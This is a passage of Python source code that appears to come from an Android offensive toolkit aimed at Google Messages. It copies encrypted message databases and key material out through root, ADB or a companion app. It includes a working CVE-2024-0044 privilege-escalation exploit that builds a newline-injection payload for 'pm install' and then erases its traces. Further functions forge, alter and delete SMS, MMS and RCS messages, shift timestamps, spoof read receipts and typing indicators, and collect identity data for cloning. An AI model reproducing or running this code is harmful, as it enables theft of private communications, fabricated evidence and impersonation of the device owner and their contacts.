self._shell(f'su -c "cp -r {app_dir}/shared_prefs/* {staging}/shared_prefs/ 2>/dev/null"') self._shell(f'su -c "chmod -R 644 {staging}/shared_prefs/"') # Copy files dir (Signal Protocol keys, config) self._shell(f'su -c "cp -r {app_dir}/files/* {staging}/files/ 2>/dev/null"') self._shell(f'su -c "chmod -R 644 {staging}/files/"') # Pull database files files_pulled = [] for suffix in ['', '-wal', '-shm', '-journal']: fname = f'bugle_db{suffix}' local_path = str(extract_dir / fname) pull = self._run_adb(f'pull {staging}/{fname} {local_path}') if 'bytes' in pull.lower() or os.path.exists(local_path): files_pulled.append(fname) # Pull key material keys_dir = extract_dir / 'shared_prefs' keys_dir.mkdir(exist_ok=True) self._run_adb(f'pull {staging}/shared_prefs/ {keys_dir}/') files_dir = extract_dir / 'files' files_dir.mkdir(exist_ok=True) self._run_adb(f'pull {staging}/files/ {files_dir}/') # Count key files key_files = list(keys_dir.rglob('*')) if keys_dir.exists() else [] # Cleanup self._shell(f'su -c "rm -rf {staging}"') if files_pulled: return { 'ok': True, 'method': 'root', 'files': files_pulled, 'key_files': len(key_files), 'path': str(extract_dir), 'encrypted': True, 'message': f'Extracted {len(files_pulled)} DB files + {len(key_files)} key/config files via root. ' f'Database is encrypted — use key material from shared_prefs/ to decrypt.', } return {'ok': False, 'error': 'bugle_db not found via root'} def _extract_via_archon(self, extract_dir: Path) -> Dict[str, Any]: """Extract RCS data via Archon app relay. This is the preferred method because Archon queries the database from within the app context where it is already decrypted in memory. The result is a JSON dump of decrypted messages, not the raw encrypted DB. """ staging = '/sdcard/Download/autarch_extract' # Method A: Ask Archon to dump decrypted messages to JSON broadcast_dump = ( 'shell am broadcast -a com.darkhal.archon.DUMP_MESSAGES ' f'--es output_dir {staging} ' '--ez include_rcs true ' '--ez include_sms true ' '--ez include_mms true ' 'com.darkhal.archon' ) result = self._run_adb(broadcast_dump) if 'Broadcast completed' in result: time.sleep(5) # Pull the decrypted JSON dump local_dump = str(extract_dir / 'messages_decrypted.json') pull = self._run_adb(f'pull {staging}/messages.json {local_dump}') if os.path.exists(local_dump) and os.path.getsize(local_dump) > 10: self._shell(f'rm -rf {staging}') return { 'ok': True, 'method': 'archon_decrypted', 'files': ['messages_decrypted.json'], 'path': str(extract_dir), 'encrypted': False, 'message': 'Extracted decrypted messages via Archon app relay (database queried from app context)', } # Method B: Fallback — ask Archon to copy raw DB + key material via Shizuku broadcast_raw = ( 'shell am broadcast -a com.darkhal.archon.EXTRACT_DB ' '--es target_package com.google.android.apps.messaging ' '--es database bugle_db ' f'--es output_dir {staging} ' '--ez include_keys true ' 'com.darkhal.archon' ) result = self._run_adb(broadcast_raw) if 'Broadcast completed' not in result: return {'ok': False, 'error': 'Archon broadcast failed'} time.sleep(3) files_pulled = [] for fname in ['bugle_db', 'bugle_db-wal', 'bugle_db-shm', 'encryption_key.bin', 'shared_prefs.tar']: local_path = str(extract_dir / fname) pull = self._run_adb(f'pull {staging}/{fname} {local_path}') if os.path.exists(local_path) and os.path.getsize(local_path) > 0: files_pulled.append(fname) self._shell(f'rm -rf {staging}') if files_pulled: has_key = any('key' in f or 'prefs' in f for f in files_pulled) return { 'ok': True, 'method': 'archon_raw', 'files': files_pulled, 'path': str(extract_dir), 'encrypted': True, 'has_key_material': has_key, 'message': f'Extracted {len(files_pulled)} files via Archon/Shizuku. ' + ('Key material included.' if has_key else 'WARNING: No key material — DB is encrypted.'), } return {'ok': False, 'error': 'Archon extraction produced no files'} def _extract_via_adb_backup(self, extract_dir: Path) -> Dict[str, Any]: """Extract via adb backup (deprecated on Android 12+ but may work).""" backup_file = str(extract_dir / 'messaging.ab') # Try backing up Google Messages result = self._run_adb( f'backup -nocompress com.google.android.apps.messaging', timeout=60, ) # Also try telephony provider result2 = self._run_adb( f'backup -nocompress com.android.providers.telephony', timeout=60, ) # Check if backup file was created if os.path.exists(backup_file) and os.path.getsize(backup_file) > 100: return { 'ok': True, 'method': 'adb_backup', 'files': ['messaging.ab'], 'path': str(extract_dir), 'message': 'ADB backup created (may require user confirmation on device)', 'note': 'Use extract_ab_file() to parse the .ab backup', } return {'ok': False, 'error': 'ADB backup not supported or user denied on device'} def query_bugle_db(self, sql: str) -> Dict[str, Any]: """Run SQL query against a locally extracted bugle_db.""" # Find the most recent extraction extractions = sorted(self._extracted_dir.iterdir(), reverse=True) db_path = None for ext_dir in extractions: candidate = ext_dir / 'bugle_db' if candidate.exists(): db_path = candidate break if not db_path: return {'ok': False, 'error': 'No extracted bugle_db found. Run extract_bugle_db() first.'} try: conn = sqlite3.connect(str(db_path)) conn.row_factory = sqlite3.Row cursor = conn.execute(sql) rows = [dict(r) for r in cursor.fetchall()] conn.close() return {'ok': True, 'rows': rows, 'count': len(rows), 'db_path': str(db_path)} except Exception as e: return {'ok': False, 'error': str(e)} def extract_rcs_from_bugle(self) -> Dict[str, Any]: """Extract only RCS messages from bugle_db (message_protocol >= 2).""" sql = """ SELECT m._id, m.conversation_id, m.sent_timestamp, m.received_timestamp, m.message_protocol, m.message_status, m.read, p.text AS body, p.content_type, p.uri AS attachment_uri, c.name AS conversation_name, c.snippet_text, ppl.normalized_destination AS phone_number, ppl.full_name AS contact_name, CASE WHEN ppl.sub_id = -2 THEN 'incoming' ELSE 'outgoing' END AS direction FROM messages m LEFT JOIN parts p ON m._id = p.message_id LEFT JOIN conversations c ON m.conversation_id = c._id LEFT JOIN conversation_participants cp ON cp.conversation_id = c._id LEFT JOIN participants ppl ON cp.participant_id = ppl._id WHERE m.message_protocol >= 2 ORDER BY m.sent_timestamp DESC """ return self.query_bugle_db(sql) def extract_conversations_from_bugle(self) -> Dict[str, Any]: """Full conversation export from bugle_db with all participants.""" sql = """ SELECT c._id, c.name, c.snippet_text, c.sort_timestamp, c.last_read_timestamp, c.participant_count, c.archive_status, GROUP_CONCAT(ppl.normalized_destination, '; ') AS participants, GROUP_CONCAT(ppl.full_name, '; ') AS participant_names FROM conversations c LEFT JOIN conversation_participants cp ON c._id = cp.conversation_id LEFT JOIN participants ppl ON cp.participant_id = ppl._id GROUP BY c._id ORDER BY c.sort_timestamp DESC """ return self.query_bugle_db(sql) def extract_message_edits(self) -> Dict[str, Any]: """Get RCS message edit history from bugle_db.""" sql = """ SELECT me.message_id, me.latest_message_id, me.original_rcs_messages_id, me.edited_at_timestamp_ms, me.received_at_timestamp_ms, p.text AS current_text FROM message_edits me LEFT JOIN messages m ON me.latest_message_id = m._id LEFT JOIN parts p ON m._id = p.message_id ORDER BY me.edited_at_timestamp_ms DESC """ return self.query_bugle_db(sql) def extract_all_from_bugle(self) -> Dict[str, Any]: """Complete extraction of all messages, conversations, and participants from bugle_db.""" result = {} # Messages sql_msgs = """ SELECT m._id, m.conversation_id, m.sent_timestamp, m.received_timestamp, m.message_protocol, m.message_status, m.read, m.seen, p.text AS body, p.content_type, p.uri AS attachment_uri, CASE m.message_protocol WHEN 0 THEN 'SMS' WHEN 1 THEN 'MMS' ELSE 'RCS' END AS protocol_name FROM messages m LEFT JOIN parts p ON m._id = p.message_id ORDER BY m.sent_timestamp DESC """ msgs = self.query_bugle_db(sql_msgs) result['messages'] = msgs.get('rows', []) if msgs.get('ok') else [] # Conversations convos = self.extract_conversations_from_bugle() result['conversations'] = convos.get('rows', []) if convos.get('ok') else [] # Participants sql_parts = "SELECT * FROM participants ORDER BY _id" parts = self.query_bugle_db(sql_parts) result['participants'] = parts.get('rows', []) if parts.get('ok') else [] # Edits edits = self.extract_message_edits() result['edits'] = edits.get('rows', []) if edits.get('ok') else [] result['ok'] = True result['total_messages'] = len(result['messages']) result['total_conversations'] = len(result['conversations']) result['total_participants'] = len(result['participants']) # Save to file export_path = self._exports_dir / f'bugle_full_export_{datetime.now().strftime("%Y%m%d_%H%M%S")}.json' with open(export_path, 'w') as f: json.dump(result, f, indent=2, default=str) result['export_path'] = str(export_path) return result # ══════════════════════════════════════════════════════════════════════ # §6 CVE-2024-0044 EXPLOIT # ══════════════════════════════════════════════════════════════════════ def check_cve_2024_0044(self) -> Dict[str, Any]: """Check if device is vulnerable to CVE-2024-0044 (run-as privilege escalation).""" patch_info = self.get_security_patch_level() result = { 'cve': 'CVE-2024-0044', 'description': RCS_CVES['CVE-2024-0044']['desc'], 'android_version': patch_info.get('android_version', 'unknown'), 'security_patch': patch_info.get('security_patch', 'unknown'), 'vulnerable': patch_info.get('cve_2024_0044_vulnerable', False), } if result['vulnerable']: result['message'] = ('Device appears vulnerable. Android 12/13 with security patch ' f'before 2024-10-01 (current: {result["security_patch"]})') else: result['message'] = 'Device does not appear vulnerable to CVE-2024-0044' return result def exploit_cve_2024_0044(self, target_package: str = 'com.google.android.apps.messaging') -> Dict[str, Any]: """Execute CVE-2024-0044 run-as privilege escalation. This exploits a newline injection in PackageInstallerService to forge a package entry, allowing run-as access to any app's private data. Only works on Android 12-13 with security patch before October 2024. """ # Verify vulnerability cve = self.check_cve_2024_0044() if not cve.get('vulnerable'): return {'ok': False, 'error': 'Device not vulnerable to CVE-2024-0044', 'details': cve} # Step 1: Get target app UID uid_output = self._shell(f'pm list packages -U | grep {target_package}') if self._is_error(uid_output) or target_package not in uid_output: return {'ok': False, 'error': f'Package {target_package} not found'} uid_match = re.search(r'uid:(\d+)', uid_output) if not uid_match: return {'ok': False, 'error': 'Could not determine target UID'} target_uid = uid_match.group(1) # Step 2: Create a minimal APK to push (we need any valid APK) # Use an existing small APK from the device apk_path = self._shell(f'pm path {target_package}') if self._is_error(apk_path): return {'ok': False, 'error': 'Cannot find target APK path'} apk_path = apk_path.replace('package:', '').strip() # Copy to writable location self._shell('cp /system/app/BasicDreams/BasicDreams.apk /data/local/tmp/exploit_carrier.apk 2>/dev/null') # Fallback: use any small system apk if 'error' in self._shell('ls /data/local/tmp/exploit_carrier.apk').lower(): # Try another approach — use settings apk self._shell('cp /system/priv-app/Settings/Settings.apk /data/local/tmp/exploit_carrier.apk 2>/dev/null') # Step 3: Craft the injection payload victim_name = f'autarch_victim_{int(time.time())}' payload = ( f'@null\n' f'{victim_name} {target_uid} 1 /data/user/0 ' f'default:targetSdkVersion=28 none 0 0 1 @null' ) # Step 4: Install with injected payload install_result = self._shell( f'pm install -i "{payload}" /data/local/tmp/exploit_carrier.apk', timeout=15, ) # Step 5: Verify access verify = self._shell(f'run-as {victim_name} id') if f'uid={target_uid}' in verify or 'u0_a' in verify: self._cve_exploit_active = True self._exploit_victim_name = victim_name return { 'ok': True, 'message': f'CVE-2024-0044 exploit successful. run-as {victim_name} has UID {target_uid}', 'victim_name': victim_name, 'target_uid': target_uid, 'target_package': target_package, 'verify': verify, } return { 'ok': False, 'error': 'Exploit attempt did not achieve expected UID', 'install_result': install_result, 'verify': verify, } def _extract_via_cve(self, extract_dir: Path) -> Dict[str, Any]: """Extract bugle_db using CVE-2024-0044 exploit.""" if not self._cve_exploit_active: exploit = self.exploit_cve_2024_0044() if not exploit.get('ok'): return exploit victim = self._exploit_victim_name staging = '/data/local/tmp/autarch_cve_extract' self._shell(f'mkdir -p {staging}') self._shell(f'chmod 777 {staging}') # Use run-as to access and copy databases for suffix in ['', '-wal', '-shm', '-journal']: fname = f'bugle_db{suffix}' for db_base in BUGLE_DB_PATHS: src = f'{db_base}{suffix}' self._shell( f'run-as {victim} sh -c "cat {src}" > {staging}/{fname} 2>/dev/null' ) # Pull extracted files files_pulled = [] for suffix in ['', '-wal', '-shm', '-journal']: fname = f'bugle_db{suffix}' local_path = str(extract_dir / fname) pull = self._run_adb(f'pull {staging}/{fname} {local_path}') if os.path.exists(local_path) and os.path.getsize(local_path) > 0: files_pulled.append(fname) # Cleanup self._shell(f'rm -rf {staging}') if files_pulled: return { 'ok': True, 'method': 'cve-2024-0044', 'files': files_pulled, 'path': str(extract_dir), 'message': f'Extracted {len(files_pulled)} files via CVE-2024-0044', } return {'ok': False, 'error': 'CVE extract produced no files'} def cleanup_cve_exploit(self) -> Dict[str, Any]: """Remove traces of CVE-2024-0044 exploit.""" results = [] if self._exploit_victim_name: # Uninstall the forged package out = self._shell(f'pm uninstall {self._exploit_victim_name}') results.append(f'Uninstall {self._exploit_victim_name}: {out}') # Remove staging files self._shell('rm -f /data/local/tmp/exploit_carrier.apk') self._shell('rm -rf /data/local/tmp/autarch_cve_extract') self._cve_exploit_active = False self._exploit_victim_name = None return {'ok': True, 'cleanup': results} # ══════════════════════════════════════════════════════════════════════ # §7 MESSAGE FORGING # ══════════════════════════════════════════════════════════════════════ def forge_sms(self, address: str, body: str, msg_type: int = MSG_TYPE_INBOX, timestamp: Optional[int] = None, contact_name: Optional[str] = None, read: int = 1) -> Dict[str, Any]: if not address or not body: return {'ok': False, 'error': 'Address and body are required'} ts = timestamp or self._ts_ms() bindings = { 'address': address, 'body': body, 'type': msg_type, 'date': ts, 'date_sent': ts, 'read': read, 'seen': 1, } result = self._content_insert(SMS_URI, bindings) if self._is_error(result): return {'ok': False, 'error': result} entry = { 'address': address, 'body': body, 'type': msg_type, 'timestamp': ts, 'contact_name': contact_name, 'action': 'forge_sms', 'time': datetime.now().isoformat(), } self._forged_log.append(entry) return {'ok': True, 'message': 'SMS forged successfully', 'details': entry} def forge_mms(self, address: str, subject: str = '', body: str = '', msg_box: int = MMS_BOX_INBOX, timestamp: Optional[int] = None) -> Dict[str, Any]: if not address: return {'ok': False, 'error': 'Address required'} ts = timestamp or int(time.time()) bindings = { 'msg_box': msg_box, 'date': ts, 'read': 1, 'seen': 1, } if subject: bindings['sub'] = subject result = self._content_insert(MMS_URI, bindings) if self._is_error(result): return {'ok': False, 'error': result} entry = { 'address': address, 'subject': subject, 'body': body, 'action': 'forge_mms', 'time': datetime.now().isoformat(), } self._forged_log.append(entry) return {'ok': True, 'message': 'MMS forged', 'details': entry} def forge_rcs(self, address: str, body: str, msg_type: int = MSG_TYPE_INBOX, timestamp: Optional[int] = None) -> Dict[str, Any]: """Forge an RCS message. Attempts content://rcs/ provider first, falls back to Archon relay for direct bugle_db insertion. """ if not address or not body: return {'ok': False, 'error': 'Address and body required'} ts = timestamp or self._ts_ms() # Try AOSP RCS provider bindings = { 'rcs_text': body, 'origination_timestamp': ts, } result = self._content_insert(f'{RCS_P2P_THREAD_URI}/0/incoming_message', bindings) if not self._is_error(result) and 'SecurityException' not in result: entry = { 'address': address, 'body': body, 'type': msg_type, 'timestamp': ts, 'method': 'rcs_provider', 'action': 'forge_rcs', 'time': datetime.now().isoformat(), } self._forged_log.append(entry) return {'ok': True, 'message': 'RCS message forged via provider', 'details': entry} # Fallback: Archon relay broadcast = ( f'shell am broadcast -a com.darkhal.archon.FORGE_RCS ' f'--es address "{address}" ' f'--es body "{body}" ' f'--ei type {msg_type} ' f'--el timestamp {ts} ' f'com.darkhal.archon' ) result = self._run_adb(broadcast) method = 'archon' if 'Broadcast completed' in result else 'failed' entry = { 'address': address, 'body': body, 'type': msg_type, 'timestamp': ts, 'method': method, 'action': 'forge_rcs', 'time': datetime.now().isoformat(), } self._forged_log.append(entry) if method == 'archon': return {'ok': True, 'message': 'RCS message forged via Archon', 'details': entry} return {'ok': False, 'error': 'RCS forging requires Archon app or elevated access'} def forge_conversation(self, address: str, messages: List[Dict], contact_name: Optional[str] = None) -> Dict[str, Any]: if not address or not messages: return {'ok': False, 'error': 'Address and messages required'} results = [] for msg in messages: body = msg.get('body', '') msg_type = int(msg.get('type', MSG_TYPE_INBOX)) ts = msg.get('timestamp') if ts: ts = int(ts) r = self.forge_sms(address, body, msg_type, ts, contact_name) results.append(r) ok_count = sum(1 for r in results if r.get('ok')) return { 'ok': ok_count > 0, 'message': f'Forged {ok_count}/{len(messages)} messages', 'results': results, } def bulk_forge(self, messages_list: List[Dict]) -> Dict[str, Any]: results = [] for msg in messages_list: r = self.forge_sms( address=msg.get('address', ''), body=msg.get('body', ''), msg_type=int(msg.get('type', MSG_TYPE_INBOX)), timestamp=int(msg['timestamp']) if msg.get('timestamp') else None, contact_name=msg.get('contact_name'), read=int(msg.get('read', 1)), ) results.append(r) ok_count = sum(1 for r in results if r.get('ok')) return {'ok': ok_count > 0, 'forged': ok_count, 'total': len(messages_list)} def import_sms_backup_xml(self, xml_content: str) -> Dict[str, Any]: """Import SMS from SMS Backup & Restore XML format.""" try: root = ET.fromstring(xml_content) except ET.ParseError as e: return {'ok': False, 'error': f'Invalid XML: {e}'} count = 0 errors = [] for sms_elem in root.findall('.//sms'): address = sms_elem.get('address', '') body = sms_elem.get('body', '') msg_type = int(sms_elem.get('type', '1')) date = sms_elem.get('date') read = int(sms_elem.get('read', '1')) if not address: continue ts = int(date) if date else None result = self.forge_sms(address, body, msg_type, ts, read=read) if result.get('ok'): count += 1 else: errors.append(result.get('error', 'unknown')) return { 'ok': count > 0, 'imported': count, 'errors': len(errors), 'error_details': errors[:10], } # ══════════════════════════════════════════════════════════════════════ # §8 MESSAGE MODIFICATION # ══════════════════════════════════════════════════════════════════════ def modify_message(self, msg_id: int, new_body: Optional[str] = None, new_timestamp: Optional[int] = None, new_type: Optional[int] = None, new_read: Optional[int] = None) -> Dict[str, Any]: bindings = {} if new_body is not None: bindings['body'] = new_body if new_timestamp is not None: bindings['date'] = new_timestamp if new_type is not None: bindings['type'] = new_type if new_read is not None: bindings['read'] = new_read if not bindings: return {'ok': False, 'error': 'No modifications specified'} result = self._content_update(f'{SMS_URI}{msg_id}', bindings) if self._is_error(result): return {'ok': False, 'error': result} return {'ok': True, 'message': f'Message {msg_id} modified', 'changes': bindings} def delete_message(self, msg_id: int) -> Dict[str, Any]: result = self._content_delete(f'{SMS_URI}{msg_id}') if self._is_error(result): return {'ok': False, 'error': result} return {'ok': True, 'message': f'Message {msg_id} deleted'} def delete_conversation(self, thread_id: int) -> Dict[str, Any]: result = self._content_delete(SMS_URI, where=f'thread_id={thread_id}') if self._is_error(result): return {'ok': False, 'error': result} return {'ok': True, 'message': f'Thread {thread_id} deleted'} def change_sender(self, msg_id: int, new_address: str) -> Dict[str, Any]: result = self._content_update(f'{SMS_URI}{msg_id}', {'address': new_address}) if self._is_error(result): return {'ok': False, 'error': result} return {'ok': True, 'message': f'Message {msg_id} sender changed to {new_address}'} def shift_timestamps(self, address: str, offset_minutes: int) -> Dict[str, Any]: safe_addr = address.replace("'", "''") msgs = self._content_query(SMS_URI, projection='_id:date', where=f"address='{safe_addr}'") modified = 0 offset_ms = offset_minutes * 60 * 1000 for msg in msgs: msg_id = msg.get('_id') old_date = msg.get('date') if msg_id and old_date: new_date = int(old_date) + offset_ms r = self._content_update(f'{SMS_URI}{msg_id}', {'date': new_date}) if not self._is_error(r): modified += 1 return {'ok': modified > 0, 'modified': modified, 'total': len(msgs)} def mark_all_read(self, thread_id: Optional[int] = None) -> Dict[str, Any]: where = f'thread_id={thread_id} AND read=0' if thread_id else 'read=0' result = self._content_update(SMS_URI, {'read': 1}, where=where) if self._is_error(result): return {'ok': False, 'error': result} return {'ok': True, 'message': 'Messages marked as read'} def wipe_thread(self, thread_id: int) -> Dict[str, Any]: # Delete from both SMS and MMS r1 = self._content_delete(SMS_URI, where=f'thread_id={thread_id}') r2 = self._content_delete(MMS_URI, where=f'thread_id={thread_id}') return {'ok': True, 'sms_result': r1, 'mms_result': r2, 'message': f'Thread {thread_id} wiped'} # ══════════════════════════════════════════════════════════════════════ # §9 RCS EXPLOITATION # ══════════════════════════════════════════════════════════════════════ def read_rcs_features(self, address: str) -> Dict[str, Any]: """Check RCS capabilities for a phone number.""" # Try dumpsys for RCS capability info output = self._shell(f'dumpsys telephony_ims') features = {'address': address, 'rcs_capable': False, 'features': []} if output and not self._is_error(output): if address in output: features['rcs_capable'] = True # Parse UCE capabilities for line in output.splitlines(): if 'capability' in line.lower() or 'uce' in line.lower(): features['features'].append(line.strip()) # Also try Archon query broadcast = ( f'shell am broadcast -a com.darkhal.archon.CHECK_RCS_CAPABLE ' f'--es address "{address}" com.darkhal.archon' ) self._run_adb(broadcast) return {'ok': True, **features} def spoof_rcs_read_receipt(self, msg_id: str) -> Dict[str, Any]: """Spoof a read receipt for an RCS message.""" # Via content provider update result = self._content_update( f'content://rcs/p2p_thread/0/incoming_message/{msg_id}', {'seen_timestamp': self._ts_ms()}, ) if not self._is_error(result) and 'SecurityException' not in result: return {'ok': True, 'message': f'Read receipt spoofed for message {msg_id}'} # Fallback: Archon broadcast = ( f'shell am broadcast -a com.darkhal.archon.SPOOF_READ_RECEIPT ' f'--es msg_id "{msg_id}" com.darkhal.archon' ) r = self._run_adb(broadcast) return { 'ok': 'Broadcast completed' in r, 'message': 'Read receipt spoof attempted via Archon', } def spoof_rcs_typing(self, address: str) -> Dict[str, Any]: """Send a fake typing indicator via Archon.""" broadcast = ( f'shell am broadcast -a com.darkhal.archon.SPOOF_TYPING ' f'--es address "{address}" com.darkhal.archon' ) r = self._run_adb(broadcast) return { 'ok': 'Broadcast completed' in r, 'message': f'Typing indicator spoofed to {address}', } def enumerate_rcs_providers(self) -> Dict[str, Any]: """Discover all accessible messaging content providers on the device.""" return self.enumerate_providers() def clone_rcs_identity(self) -> Dict[str, Any]: """Extract RCS registration/identity data for cloning.""" identity = {} # Get IMSI/ICCID identity['imei'] = self._shell('service call iphonesubinfo 1 | grep -o "[0-9a-f]\\{8\\}" | tail -n+2 | head -4') identity['phone_number'] = self._shell('service call iphonesubinfo 15 | grep -o "[0-9a-f]\\{8\\}" | tail -n+2 | head -4') # Get RCS provisioning state for pkg in MESSAGING_PACKAGES: sp_dir = f'/data/data/{pkg}/shared_prefs/' files = self._shell(f'run-as {self._exploit_victim_name} ls {sp_dir} 2>/dev/null') \ if self._cve_exploit_active else '' if files and not self._is_error(files): identity[f'{pkg}_shared_prefs'] = files.splitlines() # Get SIM info identity['sim_operator'] = self._shell('getprop gsm.sim.operator.alpha') identity['sim_country'] = self._shell('getprop gsm.sim.operator.iso-country') identity['network_type'] = self._shell('getprop gsm.network.type') return {'ok': True, 'identity': identity} def extract_rcs_media(self, msg_id: str) -> Dict[str, Any]: """Extract media files from RCS messages.""" # Check MMS parts for media parts = self._content_query( f'content://mms/{msg_id}/part', projection='_id:mid:ct:_data:name', ) media_files = [] for part in parts: ct = part.get('ct', '') if ct and ct != 'text/plain' and ct != 'application/smil': data_path = part.get('_data', '') if data_path: # Pull the file local_name = f"media_{msg_id}_{part.get('_id', 'unknown')}" ext = ct.split('/')[-1] if '/' in ct else 'bin' local_path = str(self._exports_dir / f'{local_name}.{ext}') pull = self._run_adb(f'pull {data_path} {local_path}') if os.path.exists(local_path): media_files.append({ 'content_type': ct, 'local_path': local_path, 'device_path': data_path, 'name': part.get('name', ''), }) return {'ok': True, 'media': media_files, 'count': len(media_files)} def intercept_archival_broadcast(self) -> Dict[str, Any]: """Set up interception of GOOGLE_MESSAGES_ARCHIVAL_UPDATE broadcasts. This is the enterprise archival broadcast that Google Messages sends when messages are sent, received, edited, or deleted on managed devices. """ # Register a broadcast receiver via Archon broadcast = ( 'shell am broadcast -a com.darkhal.archon.REGISTER_ARCHIVAL_LISTENER ' 'com.darkhal.archon' ) r = self._run_adb(broadcast) info = { 'broadcast_action': ARCHIVAL_BROADCAST_ACTION, 'uri_extra_key': ARCHIVAL_URI_EXTRA, 'note': 'Requires fully managed device with Google Messages as default SMS app', 'requirement': 'MCM config: messages_archival = com.darkhal.archon', } return { 'ok': 'Broadcast completed' in r, 'message': 'Archival listener registration attempted', 'info': info, } def extract_signal_protocol_state(self) -> Dict[str, Any]: """Extract E2EE Signal Protocol session state (requires elevated access).""" if not self._cve_exploit_active: return { 'ok': False, 'error': 'Requires CVE-2024-0044 exploit or root access', 'note': 'Signal Protocol keys are in ' '/data/data/com.google.android.apps.messaging/files/ ' 'but master key is in Android Keystore (hardware-backed, not extractable via ADB)', } victim = self._exploit_victim_name # List files in the messaging app's files directory files = self._shell( f'run-as {victim} ls -la /data/data/com.google.android.apps.messaging/files/' ) # List shared_prefs prefs = self._shell( f'run-as {victim} ls -la /data/data/com.google.android.apps.messaging/shared_prefs/' ) return { 'ok': True, 'files_dir': files.splitlines() if files and not self._is_error(files) else [], 'shared_prefs': prefs.splitlines() if prefs and not self._is_error(prefs) else [], 'note': 'Session keys found but master encryption key is hardware-backed in Android Keystore', } def get_rcs_cve_database(self) -> Dict[str, Any]: """Return known CVEs affecting RCS/Android messaging.""" return {'ok': True, 'cves': RCS_CVES, 'count': len(RCS_CVES)} # ══════════════════════════════════════════════════════════════════════ # §10 DATABASE BACKUP & CLONE # ══════════════════════════════════════════════════════════════════════ def backup_rcs_to_xml(self) -> Dict[str, Any]: """Backup all RCS messages to SMS Backup & Restore compatible XML. Reads RCS messages from the MMS content provider (where Google Messages syncs them as MMS records), extracts the plaintext body from parts, and writes them in SMS Backup & Restore XML format. Works on any Android with ADB — no root, no exploits. """ timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') # Get ALL messages via MMS provider (includes both MMS and RCS) all_msgs = self.read_rcs_via_mms(limit=10000) rcs_msgs = [m for m in all_msgs if m.get('is_rcs')] all_sms = self.read_sms_database(limit=10000) # Build XML total = len(all_sms) + len(all_msgs) root = ET.Element('smses', count=str(total), backup_date=str(self._ts_ms()), type='full', autarch_version='2.3') # Add SMS messages for msg in all_sms: attrs = { 'protocol': str(msg.get('protocol', '0') or '0'), 'address': str(msg.get('address', '') or ''), 'date': str(msg.get('date', '') or ''), 'type': str(msg.get('type', '1') or '1'), 'body': str(msg.get('body', '') or ''), 'read': str(msg.get('read', '1') or '1'), 'status': str(msg.get('status', '-1') or '-1'), 'locked': str(msg.get('locked', '0') or '0'), 'date_sent': str(msg.get('date_sent', '0') or '0'), 'readable_date': str(msg.get('date_formatted', '') or ''), 'contact_name': str(msg.get('contact_name', '(Unknown)') or '(Unknown)'), 'msg_protocol': 'SMS', } ET.SubElement(root, 'sms', **attrs) # Add RCS/MMS messages for msg in all_msgs: # Get sender address sender = msg.get('sender', '') if not sender and msg.get('addresses'): for a in msg['addresses']: if a.get('address') and a['address'] != 'insert-address-token': sender = a['address'] break ts_ms = msg.get('date_ms', msg.get('date', '0')) msg_type = '1' if msg.get('direction') == 'incoming' else '2' attrs = { 'protocol': '0', 'address': sender, 'date': str(ts_ms), 'type': msg_type, 'body': str(msg.get('body', '') or ''), 'read': '1', 'status': '-1', 'locked': '0', 'date_sent': str(ts_ms), 'readable_date': str(msg.get('date_formatted', '') or ''), 'contact_name': '(Unknown)', 'msg_protocol': 'RCS' if msg.get('is_rcs') else 'MMS', 'thread_id': str(msg.get('thread_id', '') or ''), } # Add RCS metadata if available if msg.get('is_rcs') and msg.get('rcs_metadata'): attrs['rcs_tr_id'] = msg['rcs_metadata'] # Add all addresses as comma-separated for group chats if len(msg.get('addresses', [])) > 1: attrs['group_addresses'] = ','.join( a['address'] for a in msg['addresses'] if a.get('address') and a['address'] != 'insert-address-token' ) ET.SubElement(root, 'sms', **attrs) # Write to file backup_path = self._backups_dir / f'rcs_backup_{timestamp}.xml' tree = ET.ElementTree(root) ET.indent(tree, space=' ') tree.write(str(backup_path), encoding='unicode', xml_declaration=True) return { 'ok': True, 'path': str(backup_path), 'sms_count': len(all_sms), 'mms_count': len(all_msgs) - len(rcs_msgs), 'rcs_count': len(rcs_msgs), 'total': total, 'message': f'Backup saved: {len(all_sms)} SMS + {len(rcs_msgs)} RCS + ' f'{len(all_msgs) - len(rcs_msgs)} MMS = {total} total', } def full_backup(self, fmt: str = 'json') -> Dict[str, Any]: """Complete SMS/MMS/RCS backup.""" timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') # Get SMS sms = self.read_sms_database(limit=10000) # Get MMS mms = self.read_mms_database(limit=5000) # Get conversations convos = self.read_conversations(limit=1000) # Try RCS provider rcs = self.read_rcs_provider() backup = { 'timestamp': timestamp, 'device': self.get_device_info(), 'sms': sms, 'mms': mms, 'conversations': convos, 'rcs': rcs if rcs.get('ok') else {}, 'stats': { 'sms_count': len(sms), 'mms_count': len(mms), 'conversation_count': len(convos), }, } if fmt == 'xml': backup_path = self._backups_dir / f'backup_{timestamp}.xml' self._write_sms_backup_xml(sms, str(backup_path)) else: backup_path = self._backups_dir / f'backup_{timestamp}.json' with open(backup_path, 'w') as f: json.dump(backup, f, indent=2, default=str) return { 'ok': True, 'path': str(backup_path), 'stats': backup['stats'], 'message': f'Backup saved to {backup_path}', } def _write_sms_backup_xml(self, messages: List[Dict], path: str): """Write SMS Backup & Restore compatible XML.""" root = ET.Element('smses', count=str(len(messages))) for msg in messages: attrs = { 'protocol': str(msg.get('protocol', '0') or '0'), 'address': str(msg.get('address', '') or ''), 'date': str(msg.get('date', '') or ''), 'type': str(msg.get('type', '1') or '1'), 'body': str(msg.get('body', '') or ''), 'read': str(msg.get('read', '1') or '1'), 'status': str(msg.get('status', '-1') or '-1'), 'locked': str(msg.get('locked', '0') or '0'), 'date_sent': str(msg.get('date_sent', '0') or '0'), 'readable_date': str(msg.get('date_formatted', '') or ''), 'contact_name': str(msg.get('contact_name', '(Unknown)') or '(Unknown)'), } ET.SubElement(root, 'sms', **attrs) tree = ET.ElementTree(root) ET.indent(tree, space=' ') tree.write(path, encoding='unicode', xml_declaration=True) def full_restore(self, backup_path: str) -> Dict[str, Any]: """Restore messages from a backup file.""" path = Path(backup_path) if not path.exists(): # Check in backups dir path = self._backups_dir / backup_path if not path.exists(): return {'ok': False, 'error': f'Backup file not found: {backup_path}'} if path.suffix == '.xml': with open(path, 'r') as f: return self.import_sms_backup_xml(f.read()) elif path.suffix == '.json': with open(path, 'r') as f: backup = json.load(f) sms = backup.get('sms', []) if not sms: return {'ok': False, 'error': 'No SMS messages in backup'} return self.bulk_forge(sms) return {'ok': False, 'error': f'Unsupported format: {path.suffix}'} def clone_to_device(self) -> Dict[str, Any]: """Clone all messages from current device backup to another device. 